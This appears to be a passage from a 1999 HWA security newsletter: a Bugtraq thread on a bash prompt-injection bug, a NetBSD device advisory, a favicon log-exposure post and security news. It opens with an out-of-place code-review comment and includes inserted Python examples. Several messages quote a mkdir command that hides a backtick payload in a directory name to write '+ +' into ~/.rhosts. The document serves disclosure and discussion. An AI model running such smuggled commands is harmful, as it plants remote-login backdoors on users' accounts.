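        Review bot: the escaped copy can be silently truncated. The loop stops at `j < MAXPATHLEN - 2`, so a long directory name containing several `slashify_in_quotes` characters (each needs two bytes) is cut short and the prompt then shows a wrong path with no indication; since the result goes back into `t_string` via `strcpy`, the honest options are to fall back to the unescaped name when it does not fit or to size both buffers for the worst case (twice the path length). A short comment above the `strcspn` test saying why this is needed (the `\w`/`\W` text is re-scanned by the later backquote and `$` expansion of the prompt) would help the next reader, and if `member()` and `slashify_in_quotes` are not already visible at this point in parse.y they need extern declarations.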
       
       ----------------------------------------------------------------------------
       
       Date: Wed, 21 Apr 1999 20:39:48 EDT
       From: Andy Church <achurch@DRAGONFIRE.NET>
       To: BUGTRAQ@netspace.org
       Subject: Re: Bash Bug
       
       >Figured while everyone was working with bash, I might as well make this
        >one public (I apologize if this is old news; apparently it hasn't been fixed
       >if so).
       >
       >If a user creates a directory with a command like
       >
       >mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
       >
       >and someone cd's into said directory, either by accident, or whatever,
       >then it will cause it to actually execute.
       
            Just to clarify, this only happens if PS1 (the bash prompt) contains
       \w or \W _and_ a prompt is displayed containing the bogus directory name.
       This means unattended shell scripts are safe.  As a workaround, use `pwd`
       in place of \w.
       
            Tested with bash 1.14 (it's the only one I have handy).
       
         --Andy Church
           achurch@dragonfire.net
           http://achurch.dragonfire.net/
       
       ----------------------------------------------------------------------------
       
       Date: Thu, 22 Apr 1999 03:18:48 +0200
       From: Marc Lehmann <pcg@GOOF.COM>
       To: BUGTRAQ@netspace.org
       Subject: Re: Bash Bug
       
       On Tue, Apr 20, 1999 at 09:25:47PM -0400, Shadow wrote:
       >
       > If a user creates a directory with a command like
       >
       > mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
       
       It seems to me that this is related to the prompt string parsing. If yes,
       then bash is not vulnerable unless configured to display the current
       directory (correct me if the root of the problem is different).
       
       Some additional notes:
       
       - I was unable to reproduce this on my system, even when bash is configured
         to display the current path in the prompt. (bash 2.02.1(1))
       - The original example seemed to have too much whitespace. I used:
         mkdir "\`echo -e \"echo + +> ~\57.rhosts\" > x; source x; rm -f \x\`"
       - PS1 was set to \h:\w\$
       
       HTH
       
       --
             -----==-                                             |
             ----==-- _                                           |
             ---==---(_)__  __ ____  __       Marc Lehmann      +--
             --==---/ / _ \/ // /\ \/ /       pcg@goof.com      |e|
             -=====/_/_//_/\_,_/ /_/\_\       XX11-RIPE         --+
           The choice of a GNU generation                       |
                                                                |
       
       ----------------------------------------------------------------------------
       
       Date: Thu, 22 Apr 1999 11:16:06 +0200
       From: Pavel Kankovsky <peak@ARGO.TROJA.MFF.CUNI.CZ>
       To: BUGTRAQ@netspace.org
       Subject: Re: Bash Bug
       
       On Tue, 20 Apr 1999, Shadow wrote:
       
       > mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
       
       Bash 1.x screws up during PS1 substitution (\w, \W). Bash 2.x does not
       seem to be vulnerable. Anyway, there's a hope even for those who want to
       stick to 1.x: replace \w with $PWD, \W with ${PWD##*/} (no guarantee).
       
       --Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
       "NSA GCHQ KGB CIA nuclear conspiration war weapon spy agent... Hi Echelon!"
       
       ----------------------------------------------------------------------------
       
       Date: Fri, 23 Apr 1999 00:02:57 +0300
       From: Guy Cohen <guy@SPICE.ORG.IL>
       To: BUGTRAQ@netspace.org
       Subject: Re: Bash Bug
       
       At this (Wed, Apr 21, 1999 at 08:39:48PM -0400) day, Andy Church wrote:
       .| >If a user creates a directory with a command like
       .| >
       .| >mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
       .| >
       .|      Just to clarify, this only happens if PS1 (the bash prompt) contains
       .| \w or \W _and_ a prompt is displayed containing the bogus directory name.
       .| This means unattended shell scripts are safe.  As a workaround, use `pwd`
       .| in place of \w.
       .|
       
       Unfortunately this is not true. here is why:
       rush:/tmp> bash --version
       GNU bash, version 2.03.0(1)-release (i586-pc-linux-gnu)
       Copyright 1998 Free Software Foundation, Inc.
       rush:/tmp> bash
       bash-2.03$ echo $PS1
       \s-\v\$
       bash-2.03$ cat ~/.rhosts
       cat: /export/home/guy/.rhosts: No such file or directory
       bash-2.03$ mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
       bash-2.03$ cd \\\ \ /
       bash-2.03$ cat /export/home/guy/.rhosts\
       + +
       sh-2.03$
       
       
       --
       Guy Cohen <guy@spice.org.il>
       
       ----------------------------------------------------------------------------
       
       Date: Thu, 22 Apr 1999 17:43:24 -0400
       From: Daniel Jacobowitz <drow@FALSE.ORG>
       To: BUGTRAQ@netspace.org
       Subject: Re: Bash Bug
       
       On Fri, Apr 23, 1999 at 12:02:57AM +0300, Guy Cohen wrote:
       > Unfortunately this is not true. here is why:
       > rush:/tmp> bash --version
       > GNU bash, version 2.03.0(1)-release (i586-pc-linux-gnu)
       > Copyright 1998 Free Software Foundation, Inc.
       > rush:/tmp> bash
       > bash-2.03$ echo $PS1
       > \s-\v\$
       > bash-2.03$ cat ~/.rhosts
       > cat: /export/home/guy/.rhosts: No such file or directory
       > bash-2.03$ mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
       > bash-2.03$ cd \\\ \ /
       > bash-2.03$ cat /export/home/guy/.rhosts\
       > + +
       > sh-2.03$
       
       That's a quoting error.  Look at the mkdir command you typed, and
       observe that the backticks are not escaped - thus even inside of ""
       they are evaluated.
       
       Witness:
       
       $ ls /drow/.rh*
       ls: /drow/.rh*: No such file or directory
       $ echo $PS1
       \$
       $ mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
       $ ls /drow/.rhosts\
       /drow/.rhosts
       
       
       It doesn't even get .rhosts right - there's a space at the end.  You
       told bash to make the directory:
         `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ `
       
       Dan
       
       /--------------------------------\  /--------------------------------\
       |       Daniel Jacobowitz        |__|     CMU, CS class of 2002      |
       |   Debian GNU/Linux Developer    __   Part-Time Systems Programmer  |
       |         dan@debian.org         |  |        drow@cs.cmu.edu         |
       \--------------------------------/  \--------------------------------/
       
       ----------------------------------------------------------------------------
       
       Date: Thu, 22 Apr 1999 15:44:35 -0400
       From: Chet Ramey <chet@NIKE.INS.CWRU.EDU>
       Reply-To: chet@po.CWRU.Edu
       To: BUGTRAQ@netspace.org
       Subject: Re: Bash Bug
       
       > On Tue, 20 Apr 1999, Shadow wrote:
       >
       > > mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
       >
       > Bash 1.x screws up during PS1 substitution (\w, \W). Bash 2.x does not
       > seem to be vulnerable. Anyway, there's a hope even for those who want to
       > stick to 1.x: replace \w with $PWD, \W with ${PWD##*/} (no guarantee).
       
       This is correct; the bug was fixed in bash-2.0, which was released in
       December, 1996.  If you're still running 1.14.x, or earlier versions,
       you should upgrade to bash-2.03.
       
       --
       ``The lyf so short, the craft so long to lerne.'' - Chaucer
       ( ``Discere est Dolere'' -- chet)
       
       Chet Ramey, Case Western Reserve University     Internet: chet@po.CWRU.Edu
       
       ----------------------------------------------------------------------------
       
       Date: Fri, 23 Apr 1999 11:25:58 +0100
       From: Ph. Rueegsegger <philip.rueegsegger@BRUKER.CH>
       To: BUGTRAQ@netspace.org
       Subject: Re: Bash Bug
       
       Date sent:              Thu, 22 Apr 1999 01:39:48 +0100
       Send reply to:          Andy Church <achurch@DRAGONFIRE.NET>
        From:                   Andy Church <achurch@DRAGONFIRE.NET>
       Subject:                Re: Bash Bug
       Originally to:          shadow@OPERATOR.ORG
       To:                     BUGTRAQ@netspace.org
       
       Hello together
       
       > >Figured while everyone was working with bash, I might as well
       make this
        > >one public (I apologize if this is old news; apparently it hasn't been fixed
       > >if so).
       > >
       > >If a user creates a directory with a command like
       > >
       > >mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
       
       Not bad !
       
       > >
       > >and someone cd's into said directory, either by accident, or whatever,
       > >then it will cause it to actually execute.
       >
       >      Just to clarify, this only happens if PS1 (the bash prompt) contains
       > \w or \W _and_ a prompt is displayed containing the bogus directory name.
       > This means unattended shell scripts are safe.  As a workaround, use `pwd`
       > in place of \w.
       
        Sorry, with bash version 2.01.1 (supplied with SuSE5.3) it is just the
        opposite of what you are clarifying. If one has \w or \W specified in
        PS1 to show the path, it does NOT happen, and if `pwd` is specified
        instead of \w or \W it DOES happen.
       
       >
       >      Tested with bash 1.14 (it's the only one I have handy).
       >
       >   --Andy Church
       >     achurch@dragonfire.net
       >     http://achurch.dragonfire.net/
       
       Kind regards
       Phibus
       -----------------------------------------------------------
                            Philip Rueegsegger
                             System Manager
       
       Bruker AG                Direct dial   : +41-1-825 93 46
       Industriestrasse 26      Telephone     : +41-1-825 91 11
       CH-8117 Faellanden       Telefax       : +41-1-825 94 69
       Switzerland              E-Mail        : philip.rueegsegger@bruker.ch
       -----------------------------------------------------------
       
       ----------------------------------------------------------------------------
       
       Date: Tue, 27 Apr 1999 16:38:15 +0200
       From: Peter J. Holzer <hjp@WSR.AC.AT>
       To: BUGTRAQ@netspace.org
       Subject: Re: Buffer overflow in BASH
       
       On 1999-04-19 14:59:06 -0400, Adam D. McKenna wrote:
       > I really don't see the point of people posting bash bugs here.
       > Especially not bugs in old versions. There are a lot of bash bugs, you
        > can't gain any extra privileges by exploiting them though.
       
       You can, if you can trigger the bug in a script which is not running
       with your privileges - suid and cgi scripts are obvious examples.
       
       So, posting bash bug reports at least reminds people that using
       bash - especially old versions - for such scripts is not a good idea.
       
               hp
       
       --
          _  | Peter J. Holzer             | Where do you want your keys
       |_|_) | Sysadmin WSR / Obmann LUGA  | to go today?
       | |   | hjp@wsr.ac.at               |     -- Tom Perrine <tep@SDSC.EDU>
       __/   | http://wsrx.wsr.ac.at/~hjp/ |        on bugtraq 1999-04-20
       
       
       @HWA      
     
  32.0  NetBSD Security Advisory 1999-009
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        
       Date: Wed, 21 Apr 1999 11:19:23 +1000
       From: matthew green <mrg@ETERNA.COM.AU>
       To: BUGTRAQ@netspace.org
       Subject: NetBSD Security Advisory 1999-009
       
       -----BEGIN PGP SIGNED MESSAGE-----
       
                        NetBSD Security Advisory 1999-009
                        =================================
       
       Topic:          SVR4 compatibility device creation vulnerability
       Version:        NetBSD 1.3.3 and prior; NetBSD-current until 19990420
       Severity:       Local users can access and modify any data on first IDE disk
       
       
       Abstract
       ========
       
       In order to provide a system environment capable of executing System V
       Release 4 (`SVR4') binaries, it is necessary to create a set of device
       special files; to simplify this task, a shell script is shipped with
       the system.  Due to a mismatch of device major numbers between NetBSD
       platforms, one device special file is erroneously created with a wrong
       major number, which may allow a regular user to arbitrarily read or
       write any data stored on the NetBSD portion of the first IDE disk
       configured by the system.
       
       This vulnerability is restricted to the i386 port of NetBSD with SVR4
       emulation additionally configured only.
       
       
       Technical Details
       =================
       
       The SVR4 /dev/wabi character device special file, usually created
       below the /emul/svr4 hierarchy, is currently supposed to be a synonym
       for the /dev/null device special file.
       
       Originally developed on the sparc port of NetBSD, the SVR4_MAKEDEV
       shell script creates this file with a major number of 3 and a minor
       number of 2, setting these properties equivalent to those of the
       /dev/null device special file on that platform.  On the i386 port of
       NetBSD, the character device major number 3 is associated with the
       wd(4) driver, which supports IDE (and compatible) disks, and whose
       minor number 2 denotes the NetBSD portion of the first such disk
        configured by the system; this corresponds to the special device file
       /dev/rwd0c in the base distribution.  As the /dev/wabi special device
       file is created with world read and write permissions, a regular user
       may read and write any data stored on that portion of the disk.
       
       The effects of actually running the WABI software on a vulnerable system
       have not been investigated.
       
       
       Solutions and Workarounds
       =========================
       
       A patch is available for the NetBSD 1.3.3 which makes the SVR4_MAKEDEV
       shell script create the wabi device special file with the correct
       properties.  You may find this patch on the NetBSD ftp server:
       
           ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/patches/19990419-SVR4_MAKEDEV
       
       NetBSD-current since 19990420 is not vulnerable.  Users of
       NetBSD-current should upgrade to a source tree later than 19990420.
       
       Once the SVR4_MAKEDEV script is updated, re-run it to recreate the
       wabi device with the correct parameters.
       
       If this action cannot be taken, an immediate workaround is to remove
        the existing device special file and create a new one, which can be
       done by executing the following shell command sequence as the super-user:
       
               # /bin/rm -f /emul/svr4/dev/wabi
               # /sbin/mknod /emul/svr4/dev/wabi c 2 2
               # /bin/chmod u=rw,g=rw,o=rw /emul/svr4/dev/wabi
       
       
       Thanks To
       =========
       
       The vulnerability was discovered by Klaus Klein <kleink@ira.uka.de>,
       who also provided the solution and authored this advisory.
       
       
       Revision History
       ================
       
               1999/04/17 - initial version
       
               1999/04/19 - dates were incorrect
       
       
       More Information
       ================
       
       Information about NetBSD and NetBSD security can be found at
       http://www.NetBSD.ORG/ and http://www.NetBSD.ORG/Security/.
       
       
       Copyright 1999, The NetBSD Foundation, Inc.  All Rights Reserved.
       
       $NetBSD: NetBSD-SA1999-009.txt,v 1.2 1999/04/19 15:07:52 mrg Exp $
       
       -----BEGIN PGP SIGNATURE-----
       Version: 2.6.3ia
       Charset: noconv
       
       iQCVAwUBNxwkvz5Ru2/4N2IFAQEbuQQAtv2ho3MWYYihmZBagGnX6Wd0KD+mTIh0
       liV32yx46kVELmCGrS4pEQh3fBNNgYkYBjympKrC/Iy1Vj9DMAMBNLGedFu10yXT
       oJnKLcmNmjEE8qRnqwjBRUIn/kURvG6wakgC9n6OuCOIcdtYeiUmgFhoPyl4lzKf
       FRpxHkqZnLo=
       =9Ypx
       -----END PGP SIGNATURE-----
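        The advisory's mechanism, a hardcoded major number that names /dev/null on sparc
        but the wd(4) disk driver on i386, is easiest to catch by comparing the created
        node against the live /dev/null of the same host rather than against any fixed
        number. The Python below is an added example written for this digest, not part
        of the advisory or of NetBSD: audit_alias() works on constructed (kind, major,
        minor) values taken from the advisory's text, and audit_aliases() performs the
        same comparison against real nodes when run on a NetBSD box (it assumes the alias
        and /dev/null paths you pass it exist).

```python
import os
import stat

# A device special file is identified by (kind, major, minor); kind is "c" or "b".

def device_identity(st):
    """Return ("c"|"b", major, minor) for a device node's stat result, or None
    if the path is not a device special file at all."""
    if stat.S_ISCHR(st.st_mode):
        kind = "c"
    elif stat.S_ISBLK(st.st_mode):
        kind = "b"
    else:
        return None
    return (kind, os.major(st.st_rdev), os.minor(st.st_rdev))


def audit_alias(alias_id, alias_mode, canonical_id):
    """Check that an alias node really duplicates its canonical node.

    alias_id / canonical_id are (kind, major, minor) tuples as returned by
    device_identity(); alias_mode is the st_mode of the alias.  Returns a
    list of findings; an empty list means the alias is a faithful copy."""
    if alias_id is None:
        return ["alias is not a device special file"]
    if canonical_id is None:
        return ["canonical node is not a device special file"]
    findings = []
    if alias_id != canonical_id:
        findings.append("device mismatch: alias is %s %d,%d but canonical is %s %d,%d"
                        % (alias_id + canonical_id))
        # World access only matters once the alias names the wrong device:
        # /dev/null itself is meant to be readable and writable by everyone.
        if alias_mode & (stat.S_IROTH | stat.S_IWOTH):
            findings.append("alias is world-accessible, so any local user reaches the wrong device")
    return findings


def audit_aliases(alias_map):
    """alias_map: {alias_path: canonical_path}.  Reads the live nodes, so the
    reference values come from this host's own /dev rather than from a
    hardcoded major number.  Returns {alias_path: findings}."""
    report = {}
    for alias, canonical in alias_map.items():
        a = os.stat(alias)
        c = os.stat(canonical)
        report[alias] = audit_alias(device_identity(a), a.st_mode, device_identity(c))
    return report


# Numbers from the advisory, fed in as constructed stat values (no device nodes
# are created).  SVR4_MAKEDEV hardcodes sparc's /dev/null, c 3,2; on i386 that
# pair is the wd(4) driver's rwd0c, while i386's /dev/null is c 2,2.
SPARC_NULL = ("c", 3, 2)
I386_NULL = ("c", 2, 2)
WORLD_RW_CHAR = stat.S_IFCHR | 0o666   # crw-rw-rw-, as SVR4_MAKEDEV creates wabi

def demo():
    bad = audit_alias(SPARC_NULL, WORLD_RW_CHAR, I386_NULL)   # wabi on i386: two findings
    good = audit_alias(I386_NULL, WORLD_RW_CHAR, I386_NULL)   # after the fix: no findings
    return bad, good

if __name__ == "__main__":
    for name, findings in zip(("i386 before patch", "i386 after patch"), demo()):
        print(name, "->", findings or "ok")
```

        On a live system the call would be audit_aliases({"/emul/svr4/dev/wabi": "/dev/null"});
        the point of deriving the reference from the running host is that the same script
        is correct on every port without knowing any platform's major numbers.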
       
       @HWA    
     
 33.0  Explorer favicon.ico bug introduces new vulnerabilities
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Date: Fri, 16 Apr 1999 22:11:22 -0700
       From: "Robert David Graham" <rob@netice.com>
       Subject: favicon.ico
       
       In case you haven't heard, Microsoft has a new feature in IE 5.0 web
        browser. When you add a website to your "Favorites" (aka. Bookmarks for you
       Netscape users), the browser attempts to download a graphic called
       "favicon.ico", then show that icon along with the title of the webpage.
       
       This has two risks.
       
        First of all, the website owner is notified when you add the page to your
       favorites, revealing information about yourself. A discussion of this can be
       found at http://msdn.microsoft.com/workshop/essentials/versions/ICPIE5.asp
       This privacy risk is probably minor, but I've seen several press articles on
       the subject.
       
       The second RISK is much more severe. Go to AltaVista (or any search engine)
       and search for "favicon.ico". You now have a list of 500 websites that
       expose their access logs. In the logs, you can find several websites that
       expose the URLs of CGI scripts, including passwords. Through manual
       searching, I found 2 sites that exposed logon information; I'm sure I can
       write a program that would scan those logs to look for CGI programs and get
       even more. This also exposes even more privacy information because these
       logs often contain the Referer field as well.
       
       This isn't unique to "favicon.ico". The RISK is really:
       
       * people are unintentionally exposing access logs on their web sites,
         exposing user information and possible passwords.
       * hackers can easily find vulnerable systems not by scanning the site itself
         (which can be detected by intrusion detection systems), but by searching a
         3rd party like AltaVista.
       
       Robert Graham
       CTO, Network ICE
       http://www.networkice.com/advice
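        As an added example that is not part of Graham's post, here is the kind of
        scanner he describes: it parses Common/Combined Log Format lines and reports
        every request path or Referer whose query string carries a credential-like
        parameter. The sample lines, the CRED_PARAMS list and the masking rule are
        assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Combined Log Format: host ident authuser [date] "request" status bytes "referer" "user-agent"
# (the last two fields are absent in plain Common Log Format, so they are optional here).
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?$'
)

# Query-parameter names that commonly carry credentials.  Assumption made for
# this example; extend it for the CGI programs a given site actually runs.
CRED_PARAMS = {"password", "passwd", "pwd", "pass", "pw", "secret", "token",
               "sid", "sessionid", "session"}

def mask(value):
    """Keep the first two characters so a hit is recognisable without copying the secret."""
    return value[:2] + "*" * max(len(value) - 2, 0)

def credential_params(url):
    """Return [(name, masked_value)] for credential-like parameters in a URL or path."""
    query = urlsplit(url).query
    return [(k, mask(v)) for k, v in parse_qsl(query, keep_blank_values=True)
            if k.lower() in CRED_PARAMS]

def scan_log(lines):
    """Scan log lines; report every request path or Referer whose query string
    carries a credential-like parameter."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line.rstrip("\r\n"))
        if not m:
            continue   # not a CLF/combined line; a real tool would count these
        for field in ("path", "referer"):
            url = m.group(field)
            if not url or url == "-":
                continue
            hits = credential_params(url)
            if hits:
                findings.append({"line": lineno, "field": field,
                                 "client": m.group("host"), "url": url, "params": hits})
    return findings

# Constructed sample: three lines in the shape a 1999 httpd would write.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Apr/1999:22:01:12 -0700] "GET /favicon.ico HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0)"
10.0.0.7 - - [16/Apr/1999:22:03:41 -0700] "GET /cgi-bin/login.pl?user=alice&password=hunter2 HTTP/1.0" 200 1532 "-" "Mozilla/4.5"
10.0.0.9 - - [16/Apr/1999:22:05:02 -0700] "GET /members/index.html HTTP/1.0" 200 8810 "http://other.example/cgi-bin/auth.cgi?pwd=s3cret" "Mozilla/4.5"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print("line %(line)d %(field)s from %(client)s: %(params)s" % f)
```

        The Referer check is the part that turns one site's exposed log into a leak
        about other sites: a credential in a Referer was sent to somebody else's CGI,
        and the host that logged it never needed to know it.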
       
       @HWA    
      
 34.0  Lets hear it for CERT the good guys!
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        via HNN http://www.hackernews.com/
       
       CERT the Good Guys? 


       contributed by turtlex 
       Obviously written by someone who didn't even bother
       looking for an opposing viewpoint this ABC News article
       praises CERT for all the good work that they have done.
        While CERT does try, let's not forget that they are in bed
        with the vendors and are usually several months late with
        advisories. This article ignores all of that and labels
       them as "the users last hope". 

       ABC News;
       
       http://abcnews.go.com/sections/tech/DailyNews/cert990422.html
       
        The Internet's Men in Black 
       
       CERT Serves and Protects Netizens 
                                                             

       By Michael J. Martinez
       ABCNEWS.com
       
        April 24 -- In November 1988, a student at Cornell University unleashed a worm, or self-replicating computer 
       program, upon the nascent Internet. The worm invaded the academic computers that hosted the Net, hogging 
       all of their processing power. Though the worm invaded fewer than 5 percent of the host computers, the 
       entire system was shut down for days while an ad hoc team of academics struggled to eject it. Officials at
       the U.S. Defense Department, which sponsored the original ARPANET and its evolution to the Internet, quickly
       decided that coordinated efforts were needed to combat such invasions. Thus was born the Computer Emergency
       Response Team Coordination Center (CERT/CC, commonly known as CERT). 
       
        In the 10 years since, the 15-member CERT, hosted by the Software Engineering Institute at Carnegie Mellon
       University, has become the de facto defender of the Internet, helping users around the world protect themselves 
       from all sorts of computer menaces. 

        Users' Last Hope 
       
       Many corporations, government agencies and universities now have their own computer emergency response teams.
       CERT was the first, and it still has the broadest charter of any such team: protect the Internet. 
        "We're kind of the last hope for a lot of people," says Jeff Carpenter, head of the incident response team at
        CERT. "When administrators can't figure out what's going on, they call us." 

         CERT gets dozens of phone calls and e-mails every day from system administrators (sysadmins, in the industry
       jargon) around the world, describing virus infestations, minor system infiltrations and widespread attacks by
        malicious hackers. "We've seen almost everything," Carpenter says. "A very small percentage of what we receive are
        reports of new problems. There's very little out there that really surprises us." 

          The Melissa virus, which made global headlines in late March, was nothing new to CERT, except for the fact
       that it spread faster than nearly anything else seen before. The CERT team put out an advisory on Melissa within
       days of its release, after a marathon overnight analysis session. The virus appeared on a Friday; the advisory was
      posted on the CERT Web site early Saturday morning. 
           
            "In Melissa's case, we put out the alert because we knew it would become far worse without that kind of
       awareness," Carpenter says. "We knew that people would come in on Monday and if they weren't warned, they'd
       start spreading it even further." 

      Advisers, Not Policemen
      
      One of the common misconceptions about CERT is that it exists to catch malicious hackers and virus writers. But
      CERT is not a law enforcement agency. Instead, the center focuses on responding quickly to specific attacks and to
       potential vulnerabilities, and making sure they don't happen again. 
           
           The center is divided into two teams: the incident response team and the vulnerability assessment team. While
      the incident response team helps system administrators recover from a hacking or virus incident, the vulnerability
      assessment team responds to inquiries about inherent software problems. 
           
            "These problems don't come in from security researchers or anything like that," says Shawn Hernan, who
       heads the vulnerability team. "These are from sysadmins who are probably using their software in ways that the
       vendor might not have considered." 

      Preventive Measures
      
      So far this year, there have been only four major CERT advisories. Besides the Melissa virus, two spelled out new
      tricks in the placement of Trojan horse programs (applets that appear harmless, but release viruses or hacking tools
      once activated). The fourth dealt with a variation on an old way to sneak programming code into a server. 
           
           The rest of the time, CERT team members advise system administrators and software vendors on the best
      ways to protect themselves. 
      
            "You would really be amazed at how many people just don't take the time to download the patches they need from
       their software and anti-virus vendors," Carpenter says. "We always tell them to make sure that every single patch is
       installed. Otherwise it's fairly easy for an intruder to gain access." 
           
            "CERT is really invaluable," says Motoaki Yumamura, an anti-virus researcher at Symantec Corp. "They give us a
       lot of great information, which we can translate into products to help our customers." 
           
           For CERT researchers, however, the responsibilities and rewards go beyond commercial concerns. 
            "The Internet is the best opportunity for new and exciting societal changes," says Hernan. "To work in an
       organization like CERT is to have a positive effect on the Internet." 
                 
       @HWA                 
       
 35.0  NASA finds scapegoat? - Programmer indicted
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
        From HNN http://www.hackernews.com/ April 29th
       
        NASA Finds Scapegoat? 


       contributed by Dave Merritt 
        After notifying NASA of several serious security holes,
        which anyone with a login account could access, NASA
       chose to cover it up and make a scapegoat out of the
       individual. This news article has twisted the story to
       make it seem that Dave Merritt had malicious intentions
       while he claims he was trying to help by pointing out
       possible vulnerabilities. Mr. Merritt is seeking legal
       representation. If anyone can help please contact us
       here. (Why is a case against NASA being prosecuted by
       a County DA, doesn't the fact that it is NASA make it a
       federal crime?) 

       Houston Chronicle 
       http://www.chron.com/cgi-bin/auth/story.mpl/content/interactive/space/news/99/990427.html
 
       April 26, 1999, 08:39 p.m. 

      Programmer who allegedly broke into NASA computers is
      indicted

      By STEVE BREWER
      Copyright 1999 Houston Chronicle

      A programmer who once wrote software for the international space station was indicted Monday on
      accusations that he took a code-breaking program off the Internet and used it to explore NASA
      computers. 

      David Merritt, 41, was charged with breach of computer security, said Assistant Harris County District
       Attorney Terry Jennings. Bail was set at $2,000, and Merritt was scheduled to turn himself in to
       authorities. 

      Jennings said no serious damage was done to NASA's computers and that Merritt only used the illegal
      access to explore parts of the system he couldn't normally get into. 

      But, Jennings said, NASA spent $19,000 in man-hours to investigate the problem and ensure Merritt
      hadn't caused any permanent harm. In such cases, the prosecutor added, those expenditures are counted
      as criminal damages. 

      Lance Carrington, NASA's acting assistant inspector general in Washington D.C., told the Chronicle
       Monday that much of the effort in these inquiries is usually spent ensuring that no one can access the
      computers the same way again. 

      Carrington's office conducted the initial investigation into Merritt's case. 

      Jennings said the hacking occurred between May 14 and 18 at NASA's Sonny Carter Training Facility,
      where Merritt was working on the space station project. He worked for Geo Control Systems, a Clear
      Lake company, which was a subcontractor to Boeing, NASA's prime contractor on the project. 

      For his job, Merritt had limited access to the system used to write software, but somehow he got
      encrypted passwords of other users and downloaded them to his desktop, Jennings said. He then used an
      Internet password-cracking tool called "John the Ripper" to decipher them. 

      Armed with the passwords, Merritt then accessed other parts of the NASA computer system, Jennings
      said, then later told a supervisor he had "found" the passwords. 

      A Geo Control Systems employee fielding questions on the case would only identify himself by his first
      name when contacted by the Chronicle Monday. Other than to say that Merritt no longer worked for the
      company, he said he would only comment on the case if the name of the company was not published. 

      Carrington said Merritt's case is relatively minor. But he said the fact that code-breaking technology is
      easily available on the Internet concerns government agencies that depend on high-tech computers. 

      "Because of the climate today with the evolving technology, we're overly sensitive to it. It's very
      disconcerting that this information is out there," Carrington said. "It makes life tough that you've got to
      deal with people like that -- people who know their stuff and amateurs who can get this information
      that's becoming more user-friendly. 

      Carrington said NASA has handled several high-profile cases in which hackers have breached agency
      systems. NASA has begun hiring experts who once worked for the military and the National Security
      Agency to investigate those kinds of cases. 

      The near six-year task of assembling the space station began last year. It's not staffed at this point. The
      project is led by the United States, and its partners include Russia, Europe, Japan and Canada. 

      The charge against Merritt is a state jail felony, punishable by up to two years in jail and up to a $10,000
      fine. 

      Chronicle reporter Mark Carreau contributed to this story. 
       
       
       
       @HWA
       
 36.0  CIH author found?
       ~~~~~~~~~~~~~~~~~
       
      CIH Author Identified? 

      From HNN http://www.hackernews.com/ April 29th
                                        
      contributed by mdef 
      The Tatung Institute of Technology claims that it has
      found the author of the CIH or Chernobyl virus. They
      claim that they had punished Chen Ing-hau last April
      when the virus he wrote as a student began to cause
      damage in an inter-college data system, according to
      Lee Chee-chen, the institute's dean of student affairs.
      Chen Ing-hau has since graduated and is currently
      serving his compulsory two year stint in the Taiwanese
      military. 

      CNN
      http://www.cnn.com/TECH/computing/9904/29/computer.virus.ap/index.html
      Nando Times
      http://www.techserver.com/story/body/0,1634,43487-70127-507733-0,00.html
      
      
      CNN;
      
      Taiwan college identifies computer virus author 

      April 29, 1999
      Web posted at: 9:32 a.m. EDT (1332 GMT)

      TAIPEI, Taiwan (AP) -- A former computer engineering student was
      identified by his college today as the author of the Chernobyl virus -- the
      menace that caused hundreds of thousands of computer meltdowns around the world this week. 

      The Tatung Institute of Technology had punished Chen Ing-hau last April
      when the virus he wrote as a student began to cause damage in an
      inter-college data system, according to Lee Chee-chen, the institute's dean of
      student affairs. 

      Chen, who was a senior at the time, was given a demerit but not expelled. 

      The Chernobyl virus is known in Taiwan as the CIH, using Chen's initials. 

      The college did not mete out a more severe punishment because Chen had
      warned fellow students not to spread the virus, Lee said. Chen did not come
      up with an anti-virus program, Lee said. 

      Lee said he was not sure how the virus ended up causing so much destruction
      a year later. 

      Chen graduated from the college last summer and now is serving Taiwan's
      two-year compulsory military service, Lee said. Officials of the Bureau of
      Criminal Investigation said they would seek permission to question Chen. 

      The unusually destructive virus -- timed to strike on April 26, the 13th
      anniversary of the Chernobyl nuclear disaster -- tries to erase a computer's
      hard drive and write gibberish into its system settings to prevent the machine
      from being restarted. 

      Turkey and South Korea each reported 300,000 computers damaged Monday,
      and there were more elsewhere in Asia and the Middle East. Fewer than
      10,000 of the 50 million computers in the United States were affected. 

                           Copyright 1999   The Associated Press. All rights reserved. 
                                                        
      
      
      @HWA
 
 37.0  INTEL goes after Zero Knowledge Systems
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
